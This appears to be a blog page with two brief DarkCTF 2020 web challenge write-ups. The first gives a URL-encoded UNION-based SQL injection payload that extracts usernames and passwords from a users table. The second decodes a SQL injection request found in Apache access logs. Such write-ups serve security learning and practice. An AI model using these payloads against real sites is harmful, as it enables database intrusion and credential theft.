Cookie Consent by PrivacyPolicies.com

Latest entries | Category CTF writeups | Page 4


CTF writeups

DarkCTF 2020: Web/So_Simple

Web/So_Simple

173 points

"Try Harder" may be You get flag manually

Try id as parameter

http://web.darkarmy.xyz:30001

Solution

After spending some time on preparing sql injection payload, I've managed finally to create correct one.

http://sosimple.darkarmy.xyz/?id=0%27%20UNION%20ALL%20SELECT%20ID,username,password%20FROM%20users%20WHERE%20username%20like%20%22%{%%22%20OR%20password%20like%20%22%{%%22%20LIMIT%201,2;%20--%20

darkCTF{uniqu3_ide4_t0_find_fl4g}

DarkCTF 2020: Web/Apache Logs

Web/Apache Logs

113 points

Our servers were compromised!! Can you figure out which technique they used by looking at Apache access logs.

flag format: DarkCTF{}

Files

Solution

Found interesting request in given logs:

Decoded the request into:

http://192.168.32.134/mutillidae/index.php?page=user-info.php&username='+union+all+select+1,String.fromCharCode(102,+108,+97,+103,+32,+105,+115,+32,+68,+97,+114,+107,+67,+84,+70,+123,+53,+113,+108,+95,+49,+110,+106,+51,+99,+116,+49,+48,+110,+125),3+--+&password=&user-info-php-submit-button=View+Account+Details

Then combined the charcodes into the flag:

DarkCTF{5ql_1nj3ct10n}